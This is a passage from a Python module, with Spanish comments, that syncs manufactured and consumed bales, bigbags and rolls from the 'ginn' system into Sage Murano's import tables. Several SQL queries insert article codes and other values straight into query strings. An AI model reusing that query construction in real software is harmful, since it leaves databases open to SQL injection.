artículo) no está en Murano,\n lanza una excepción.\n Si está activado el modo de depuración, devuelve un GUID simulado\n aleatorio.\n \"\"\"\n try:\n mov_posicion = conexion.run_sql(r\"\"\"SELECT TOP 1 MovPosicion\n FROM %s.dbo.TmpIME_MovimientoStock\n WHERE NumeroSerieLc = '%s'\n ORDER BY FechaRegistro DESC;\n \"\"\" % (conexion.get_database(), codigo_articulo))[0]['MovPosicion']\n except Exception as exception: # pylint: disable=broad-except\n if not DEBUG:\n raise exception\n else:\n mov_posicion = simulate_guid()\n return mov_posicion\n\n\ndef get_ultimo_movimiento_articulo_serie(conexion, articulo):\n \"\"\"\n Devuelve el registro de Murano que contiene la última información del\n código del artículo recibido. 
Típicamente será un movimiento de entrada de\n fabricación, de salida por albarán o None si no existe el artículo en\n Murano.\n \"\"\"\n try:\n codigo_articulo = articulo.codigo\n except AttributeError:\n # Por si recibo directamente un código.\n codigo_articulo = articulo\n SQL = r\"\"\"SELECT TOP 1 *\n FROM [%s].[dbo].[MovimientoArticuloSerie]\n WHERE NumeroSerieLc = '%s' AND CodigoEmpresa = '%d'\n ORDER BY FechaRegistro DESC;\"\"\" % (conexion.get_database(),\n codigo_articulo,\n CODEMPRESA)\n try:\n registro_serie = conexion.run_sql(SQL)[0]\n except (TypeError, AttributeError, KeyError, IndexError):\n # Ese código de artículo (NumeroSerieLc) nunca ha existido en Murano.\n registro_serie = None\n return registro_serie\n\n\ndef get_codalmacen_articulo(conexion, articulo):\n \"\"\"\n Busca el último movimiento de stock del artículo y devuelve el código\n de almacén si es un movimiento de entrada o la cadena vacía si es de\n salida.\n \"\"\"\n registro_serie = get_ultimo_movimiento_articulo_serie(conexion, articulo)\n if registro_serie is None:\n # codalmacen es None o no se encontraron registros\n codalmacen = \"\"\n else:\n codalmacen = registro_serie[\"CodigoAlmacen\"]\n return codalmacen\n\n\ndef get_codigo_articulo_murano(producto):\n \"\"\"\n Hemos elegido arbitrariamente (ver export.muranize_valor) que el código\n de artículo en Murano sea [PC|PV]IDginn.\n Calcula el CodigoArticulo del producto recibido según esa expresión y lo\n devuelve.\n \"\"\"\n if isinstance(producto, pclases.ProductoVenta):\n idmurano = \"PV\"\n else:\n idmurano = \"PC\"\n idmurano += str(producto.id)\n return idmurano\n\n\ndef crear_proceso_IME(conexion):\n \"\"\"\n Crea un proceso de importación con guid único.\n \"\"\"\n guid_proceso = generar_guid(conexion)\n conexion.run_sql(r\"\"\"\n INSERT INTO %s.dbo.Iniciador_tmpIME(IdProcesoIME, EstadoIME,\n sysUsuario, sysUserName,\n Descripcion, TipoImportacion)\n VALUES ('%s', 0, 1, 'administrador', 'Gateway ginn API Murano', 254);\n \"\"\" % (conexion.get_database(), guid_proceso))\n return guid_proceso\n\n\n# pylint: disable=too-many-locals\ndef prepare_params_movstock(articulo, cantidad=1, producto=None,\n codigo_almacen=None, calidad=None, fecha=None):\n \"\"\"\n Prepara los parámetros comunes a todos los artículos con movimiento de\n serie y devuelve la conexión a la base de datos MS-SQLServer.\n Cantidad debe ser 1 para incrementar o -1 para decrementar el almacén.\n \"\"\"\n assert abs(cantidad) == 1\n # pylint: disable=no-value-for-parameter,no-member\n c = Connection()\n database = c.get_database()\n if fecha is None or not isinstance(fecha, datetime.datetime):\n # TODO: Si la fecha no es correcta, en vez de petar ignoro el\n # error silenciosamente. Danger, danger! High voltage!\n today = datetime.datetime.today()\n else:\n today = fecha\n ejercicio = today.year\n periodo = today.month\n fecha = today.strftime(\"%Y-%m-%d %H:%M:%S\")\n documento = int(today.strftime(\"%Y%m%d\"))\n if not producto:\n producto = articulo.productoVenta\n codigo_articulo = buscar_codigo_producto(producto)\n if calidad is None:\n codigo_talla = articulo.get_str_calidad()\n else:\n codigo_talla = calidad.upper()\n grupo_talla = buscar_grupo_talla(producto)\n if cantidad == 1:\n tipo_movimiento = 1 # 1 = entrada, 2 = salida.\n else:\n tipo_movimiento = 2\n if not codigo_almacen:\n codigo_almacen = buscar_codigo_almacen(articulo.almacen, articulo)\n # OJO: Este caso no se dará cuando pasemos a producción. 
Todos los bultos a\n # consumir ya estarían en Murano previamente y con un almacén asignado.\n # Para pruebas me aseguro de que se envía un almacén buscando el último\n # donde estuvo el bulto.\n if not codigo_almacen: # and tipo_movimiento == 2:\n # Es un consumo y en ginn almacen ya es None. En Murano también es\n # None porque puede ser un artículo que nunca había estado antes\n # en Murano. Como por fuerza debe llevar un almacén, buscamos el\n # almacén donde estaba antes de ser consumida la bala o bigbag.\n # Da igual el tipo de movimiento. Aunque sea una entrada, debemos\n # buscar el último almacén **al menos en pruebas**. Se da el caso en\n # que se fabrica un bigbag (por ejemplo) y se vende justo a\n # continuación antes de que dé tiempo a meterlo en Murano. Ya tiene\n # el almacén a None en ginn y ya no lo traga bien Murano.\n codigo_almacen = buscar_ultimo_almacen_conocido_para(articulo)\n # unidades = 1 # En dimensión base: 1 bala, rollo, caja, bigbag...\n # [20160207] Al final no era en dimensión base, sino en la específica.\n unidades = get_cantidad_dimension_especifica(articulo)\n # precio = 0.0\n precio_kg = buscar_precio_coste(producto, ejercicio, codigo_almacen)\n precio = estimar_precio_coste(articulo, precio_kg)\n factor_conversion = buscar_factor_conversion(producto)\n if factor_conversion:\n unidades2 = unidades * factor_conversion\n else:\n unidades2 = 1 # Siempre será uno porque por cada rollo o bala hay\n # solo 1 mov. stock y 1 mov. serie.\n importe = unidades2 * precio\n unidad_medida2 = buscar_unidad_medida_basica(producto, articulo)\n origen_movimiento = \"F\" # E = Entrada de Stock (entrada directa),\n # F (fabricación), I (inventario),\n # M (rechazo fabricación), S (Salida stock)\n return (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento)\n\n\ndef get_cantidad_dimension_especifica(articulo):\n \"\"\"\n Devuelve la cantidad a sumar o restar del stock de Murano del artículo\n con código de trazabilidad recibido. Va en undad específica: kg o m².\n \"\"\"\n if articulo.es_rollo() or articulo.es_rollo_defectuoso():\n # Los rollos C no tienen m² definidos. Se tratan al peso.\n unidades = get_superficie(articulo) # En dimensión específica: m²\n elif (articulo.es_bala() or articulo.es_bala_cable() or\n articulo.es_rollo_c() or articulo.es_bigbag() or\n articulo.es_caja()):\n # unidades = articulo.get_peso()\n # unidades = get_peso_bruto(articulo) # En dimensión específica: kg\n unidades = get_peso_neto(articulo) # En dimensión específica: kg\n return unidades\n\n\ndef buscar_ultimo_almacen_conocido_para(articulo):\n \"\"\"\n Devuelve el código de almacén de Murano para el último almacén conocido\n en ginn donde estuviera el artículo.\n \"\"\"\n # Fallback al almacén principal, por si no tuviera ABSOLUTAMENTE ningún\n # movimiento.\n last_almacen = pclases.Almacen.get_almacen_principal()\n for movimiento in articulo.get_historial_trazabilidad()[::-1]:\n # Movimientos van del más antiguo al más nuevo. 
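Cada\n        # movimiento es una tupla (fecha, objeto, almacen), como se\n        # desempaqueta justo debajo. 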
Empiezo por el final.\n        fecha, objeto, almacen = movimiento  # pylint: disable=unused-variable\n        if almacen:\n            last_almacen = almacen\n            break\n    res = buscar_codigo_almacen(last_almacen)\n    return res\n\n\ndef estimar_precio_coste(articulo, precio_kg):\n    \"\"\"\n    Estima el precio de coste del artículo recibido en función de los €/kg\n    indicados en el parámetro «precio_kg».\n    \"\"\"\n    # Este precio de coste \"requete\"-estimado es un CWT en toda regla. Ver\n    # correo del 7 de marzo de 2016 - 13:01\n    if articulo.es_rollo():\n        # Peso teórico ideal, sin embalaje.\n        peso = articulo.get_peso_teorico()\n    elif articulo.es_rollo_defectuoso():\n        peso = articulo.peso\n    elif articulo.es_rollo_c():\n        # Peso real dado en báscula, con embalaje y todo.\n        peso = articulo.peso\n    elif articulo.es_bala():\n        # Peso real dado en báscula, con embalaje y todo.\n        peso = articulo.peso\n    elif articulo.es_bala_cable():\n        # Peso real dado en báscula, con embalaje y todo.\n        peso = articulo.peso\n    elif articulo.es_bigbag():\n        # Peso real dado en báscula, con embalaje y todo.\n        peso = articulo.peso\n    elif articulo.es_caja():\n        # Peso nominal de la caja. El teórico. La embaladora no falla y el\n        # cartón es despreciable. Es el peso que se almacena como real para\n        # las cajas a la hora de fabricarlas.\n        peso = articulo.peso\n    else:\n        strerror = \"ops:estimar_precio_coste:No se pudo estimar para «%s»\" % (\n            articulo)\n        logging.error(strerror)\n        raise ValueError(strerror)\n    return peso * precio_kg\n\n\n# pylint: disable=too-many-arguments\ndef create_bala(bala, cantidad=1, producto=None, guid_proceso=None,\n                simulate=False, procesar=True, codigo_almacen=None,\n                calidad=None, comentario=None, serie='API', fecha=None):\n    \"\"\"\n    Crea una bala en las tablas temporales de Murano.\n    Recibe un objeto bala de ginn.\n    Si cantidad es -1 realiza la baja de almacén de la bala.\n    Si simulate es True, devuelve las dos consultas SQL generadas. En otro\n    caso, el valor de ejecutar el proceso de importación.\n    Si procesar es False no lanza el proceso de importación a través de la\n    DLL OEM de Murano.\n    Si no se especifica comentario (None o \"\"), se usa uno por defecto.\n    \"\"\"\n    articulo = bala.articulo\n    if cantidad > 0 and duplica_articulo(articulo):\n        logging.warning(\"La bala %s ya existe en Murano. Se ignora.\",\n                        bala.codigo)\n        res = False\n    else:\n        try:\n            partida = bala.lote.codigo\n        except AttributeError:\n            partida = \"\"  # Balas C no tienen lote. No pasa nada. Murano traga.\n        unidad_medida = \"KG\"\n        # Si comentario es \"\", viene de fabricación. Serie FAB.\n        if not comentario:\n            comentario = \"[ginn] {}\".format(bala.get_info())\n            serie = 'FAB'\n        comentario = comentario[:40]  # Por restricciones de Murano.\n        ubicacion = \"Almac. 
de fibra.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n # pylint: disable=redefined-variable-type\n # Si es una simulación, devuelvo las consultas SQL y no un bool.\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En el movimiento de serie la UnidadMedida1_ es la básica:ROLLO,BALA..\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bala.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef esta_consumido(articulo, parte_de_produccion=None):\n \"\"\"\n Devuelve la fecha de consumo si el artículo se ha consumido. None en\n otro caso.\n Los valores a mirar si se ha consumido son la serie, origen documento y\n comentario del último registro de MovimientoArticuloSerie y deberían\n ser, si es un consumo: FAB, 11 y \"Consumo (bala|bigbag) ginn.*\".\n Si `parte_de_produccion` es algo distinto de None, comprueba que se haya\n consumido en ese parte de producción. 
Se puede saber porque en el\n movimiento de Murano se guarda el ID del parte de producción.\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n # HARDCODED\n if (movserie\n and movserie['SerieDocumento'] == 'FAB'\n and movserie['OrigenDocumento'] == SALIDA\n and movserie['Comentario'].startswith('Consumo')):\n res = movserie['Fecha']\n if parte_de_produccion:\n res = (res and\n str(parte_de_produccion.id) == str(movserie['Documento']))\n else:\n res = None\n return res\n\n\ndef esta_vendido(articulo):\n \"\"\"\n Devuelve la fecha de venta si el artículo se ha vendido. None en\n otro caso.\n Los valores a mirar si se ha vendido son la serie, origen documento y\n comentario del último registro de MovimientoArticuloSerie y deberían\n ser, si es un consumo: FAB, 11 y \"Consumo (bala|bigbag) ginn.*\".\n \"\"\"\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n movserie = get_ultimo_movimiento_articulo_serie(conn, articulo)\n # HARDCODED\n if movserie and movserie['OrigenDocumento'] == VENTA:\n res = movserie['Fecha']\n else:\n res = None\n return res\n\n\ndef get_fecha_entrada(articulo, campo=\"FechaRegistro\"):\n \"\"\"\n Devuelve la fecha en que el artículo se dio de alta en Murano.\n Acepta también un código de artículo directamente en lugar de un artículo\n de ginn.\n Si el artículo no se encuentra, devuelve None.\n Permite obtener la fecha, fecha de registro o serie del alta especificando\n el campo en la llamada a la función. Por defecto devuelve la fecha de\n registro, que no tiene por qué coincidir con la fecha indicada para el\n alta.\n \"\"\"\n assert campo in (\"Fecha\", \"FechaRegistro\", \"SerieDocumento\"), \"Solo se\"\\\n \" admiten Fecha, FechaRegistro o SerieDocumento como campo a \"\\\n \"obtener.\"\n if isinstance(articulo, pclases.Articulo):\n codigo = articulo.codigo\n else:\n codigo = articulo\n # pylint: disable=no-value-for-parameter,no-member\n conn = Connection()\n sql = \"\"\"SELECT Fecha, FechaRegistro, SerieDocumento\n FROM {}.dbo.MovimientoArticuloSerie\n WHERE NumeroSerieLc = '{}'\n AND CodigoEmpresa = {}\n AND OrigenDocumento = 2\n AND (SerieDocumento = 'FAB' OR SerieDocumento = 'API')\n AND CodigoAlmacen = 'GTX';\"\"\".format(conn.get_database(),\n codigo,\n CODEMPRESA)\n try:\n res = conn.run_sql(sql)[0][campo]\n except IndexError:\n res = None\n return res\n\n\n# pylint: disable=too-many-arguments,too-many-statements\ndef consume_bala(bala, cantidad=-1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, fecha=None):\n \"\"\"\n Crea un movimiento de salida de una bala en las tablas temporales de\n Murano.\n Recibe un objeto bala de ginn.\n `cantidad` es un parámetro obsoleto que no se usa.\n Si simulate es True, devuelve las dos consultas SQL generadas. En otro\n caso, el valor de ejecutar el proceso de importación.\n Si procesar es False no lanza el proceso de importación a través de la\n DDL OEM de Murano.\n Si la bala ya estaba consumida, no se puede volver a consumir, de modo que\n devuelve False también.\n \"\"\"\n try:\n articulo = bala.articulo\n except AttributeError: # Me han pasado directamente un artículo\n articulo = bala\n if not existe_articulo(articulo):\n logging.warning(\"La bala %s no existe en Murano. Se ignora.\",\n bala.codigo)\n res = False\n elif esta_en_almacen(articulo) is False:\n logging.warning(\"La bala %s no está en almacén en Murano. 
Se ignora.\",\n bala.codigo)\n res = False\n else:\n try:\n partida = bala.lote.codigo\n except AttributeError:\n partida = \"\" # Balas C no tienen lote. No pasa nada. Murano traga.\n unidad_medida = \"KG\"\n comentario = \"Consumo bala [ginn] {}\".format(bala.get_info())[:40]\n serie = 'FAB'\n ubicacion = \"Almac. de fibra.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto,\n fecha=fecha) # pylint: disable=bad-continuation\n try:\n documento = bala.partidaCarga.numpartida # No código. Solo números\n except AttributeError:\n pass # Dejo la fecha, que es valor por defecto que trae.\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = \"CONSFIB\"[:10]\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n # pylint: disable=redefined-variable-type\n # Si es una simulación, devuelvo las consultas SQL y no un bool.\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En el movimiento de serie la UnidadMedida1_ es la básica:ROLLO,BALA..\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bala.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. 
Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef consume_partida_carga(partida_carga):\n \"\"\"\n Consume la partida de carga completa y actualiza el valor `api`:\n - Si no se ha producido ningún error, lo pone a True.\n - Si se ha producido **algún** error, lo pone a False.\n \"\"\"\n res = True\n if partida_carga:\n for bala in partida_carga.balas:\n res = ((bool(esta_consumido(bala.articulo)) or consume_bala(bala))\n and res)\n partida_carga.api = res\n partida_carga.sync()\n return res\n\n\n# pylint: disable=too-many-arguments,too-many-statements\ndef consume_bigbag(bigbag, cantidad=-1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, fecha=None, check_api=True):\n \"\"\"\n Crea un movimiento de salida de un bigbag en las tablas temporales de\n Murano. Si ya estaba consumido en el mismo parte que se está intentando\n consumir de nuevo, no crea movimientos pero devuelve True para poder\n validar el parte correctamente.\n Recibe un objeto bigbag de ginn.\n `cantidad` es un parámetro obsoleto que no se usa.\n Si simulate es True, devuelve las dos consultas SQL generadas. En otro\n caso, el valor de ejecutar el proceso de importación.\n Si procesar es False no lanza el proceso de importación a través de la\n DDL OEM de Murano.\n \"\"\"\n try:\n articulo = bigbag.articulo\n except AttributeError: # Me han pasado directamente un artículo\n articulo = bigbag\n if not existe_articulo(articulo):\n logging.warning(\"El bigbag %s no existe en Murano. Se ignora.\",\n bigbag.codigo)\n res = False\n elif not esta_en_almacen(articulo):\n logging.warning(\"El bigbag %s no está en almacén en Murano.\"\n \" Se ignora.\", bigbag.codigo)\n # Será True si estoy intentando consumir otra vez al validar de nuevo\n # un parte que se haya quedado a la mitad por lo que sea. Idempotente.\n res = esta_consumido(bigbag, bigbag.parteDeProduccion)\n else:\n try:\n partida = bigbag.loteCem.codigo\n except AttributeError:\n partida = \"\" # Balas C no tienen lote. No pasa nada. Murano traga.\n unidad_medida = \"KG\"\n comentario = \"Consumo bigbag [ginn] {}\".format(bigbag.get_info())[:40]\n serie = 'FAB'\n ubicacion = \"Almac. 
de fibra.\"[:15]\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto,\n fecha=fecha) # pylint: disable=bad-continuation\n try:\n documento = bigbag.parteDeProduccion.id # Única forma\n # numérica de localizarlo.\n except AttributeError:\n pass # Dejo la fecha, que es valor por defecto que trae.\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = \"CONSBB\"[:10]\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n # pylint: disable=redefined-variable-type\n # Si es una simulación, devuelvo las consultas SQL y no un bool.\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En el movimiento de serie la UnidadMedida1_ es la básica:ROLLO,BALA..\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bigbag.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n # Solo actualizo el valor del api si no se ha simulado y estoy\n # seguro de que en Murano se ha descontado el bigbag. Prefiero\n # intentar volver a consumir el mismo bigbag que creer que se\n # ha consumido y no volverlo a intentar jamás dejando un\n # descuadre entre ginn y Murano.\n if check_api:\n # ¿Se ha consumido pero no tiene el valor `api` bien?\n res = esta_consumido(bigbag.articulo,\n bigbag.parteDeProduccion)\n bigbag.api = res\n bigbag.syncUpdate()\n # bigbag.sync()\n else: # No proceso la importación. 
Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef create_bigbag(bigbag, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea un bigbag en Murano a partir de la información del bigbag en ginn.\n Si cantidad = -1 realiza un decremento en el almacén de Murano.\n Si no se especifica comentario, se usa uno por defecto.\n \"\"\"\n articulo = bigbag.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"El bigbag %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n else:\n partida = bigbag.loteCem.codigo\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(bigbag.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n ubicacion = \"Almac. de fibra.\"[:15]\n unidad_medida = \"KG\"\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En movimiento de serie la UnidadMedida1_ es la básica: ROLLO, BALA...\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n numero_serie_lc = bigbag.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n unidad_medida1, comentario, id_proceso_IME,\n # articulo.peso, articulo.peso_sin,\n peso_bruto, peso_neto,\n 0.0, # Metros cuadrados. Decimal NOT NULL\n \"\" # Código palé. Varchar NOT NULL\n ) # pylint: disable=bad-continuation\n if simulate:\n res.append(sql_movserie)\n else:\n c.run_sql(sql_movserie)\n # pylint: disable=redefined-variable-type\n if procesar:\n res = fire(id_proceso_IME)\n else: # No proceso la importación. 
Todo ha ido bien hasta ahora.\n # Devuelvo el guid, que me vale como True también.\n res = id_proceso_IME\n return res\n\n\ndef create_rollo(rollo, cantidad=1, producto=None, guid_proceso=None,\n simulate=False, procesar=True, codigo_almacen=None,\n calidad=None, comentario=None, serie='API', fecha=None):\n \"\"\"\n Crea un rollo en Murano a partir de la información del rollo en ginn.\n Si cantidad = -1 realiza un decremento en el almacén de Murano.\n Si no se especifica comentario, se usa uno por defecto.\n \"\"\"\n articulo = rollo.articulo\n if cantidad > 0 and duplica_articulo(articulo):\n logging.warning(\"El rollo %s ya existe en Murano. Se ignora.\",\n articulo.codigo)\n else:\n try:\n partida = rollo.partida.codigo\n except AttributeError:\n partida = \"\" # DONE: Los rollos C no tienen partida. No pasa nada\n # Si comentario es \"\", viene de fabricación. Serie FAB.\n if not comentario:\n comentario = \"[ginn] {}\".format(rollo.get_info())\n serie = 'FAB'\n comentario = comentario[:40] # Por restricciones de Murano.\n numero_serie_lc = \"\"\n # Sage me indica que no informe de la serie en el movimiento de stock\n # para solucionar lo del registro duplicado creado por Murano.\n ubicacion = \"Almac. de geotextiles.\"[:15]\n if articulo.get_str_calidad() == \"C\":\n # Los productos C se almacenan y venden en kg. No tienen largo y\n # ancho medible.\n unidad_medida = \"KG\"\n else:\n unidad_medida = \"M2\"\n # pylint: disable=bad-continuation\n (c, database, ejercicio, periodo, fecha, documento, codigo_articulo,\n codigo_almacen, grupo_talla, codigo_talla, tipo_movimiento,\n unidades, precio, importe, unidades2, unidad_medida2,\n factor_conversion, origen_movimiento) = prepare_params_movstock(\n articulo, cantidad, producto, codigo_almacen, calidad, fecha=fecha)\n if not guid_proceso:\n id_proceso_IME = crear_proceso_IME(c)\n else:\n id_proceso_IME = guid_proceso\n guid_movposicion = generar_guid(c)\n canal_div = ''\n sql_movstock = SQL_STOCK % (database,\n CODEMPRESA, ejercicio, periodo, fecha,\n serie,\n documento, codigo_articulo, codigo_almacen,\n partida, grupo_talla, codigo_talla,\n tipo_movimiento, unidades, unidad_medida,\n precio, importe, unidades2, unidad_medida2,\n factor_conversion, comentario, canal_div,\n ubicacion, origen_movimiento,\n numero_serie_lc, id_proceso_IME,\n guid_movposicion)\n if simulate:\n res = [sql_movstock]\n else:\n c.run_sql(sql_movstock)\n if cantidad < 0:\n origen_documento = SALIDA\n else:\n origen_documento = FABRICACION\n # mov_posicion_origen = get_mov_posicion(c, numero_serie_lc)\n mov_posicion_origen = guid_movposicion\n # En movimiento de serie la UnidadMedida1_ es la básica: ROLLO, BALA...\n unidad_medida1 = buscar_unidad_medida_basica(articulo.productoVenta,\n articulo)\n superficie = get_superficie(articulo) or 0\n numero_serie_lc = rollo.codigo\n peso_bruto = get_peso_bruto(articulo)\n peso_neto = get_peso_neto(articulo)\n sql_movserie = SQL_SERIE % (database,\n CODEMPRESA, codigo_articulo,\n numero_serie_lc, fecha, origen_documento,\n ejercicio, serie, documento,\n mov_posicion_origen, codigo_talla,\n codigo_almacen, ubicacion, partida,\n 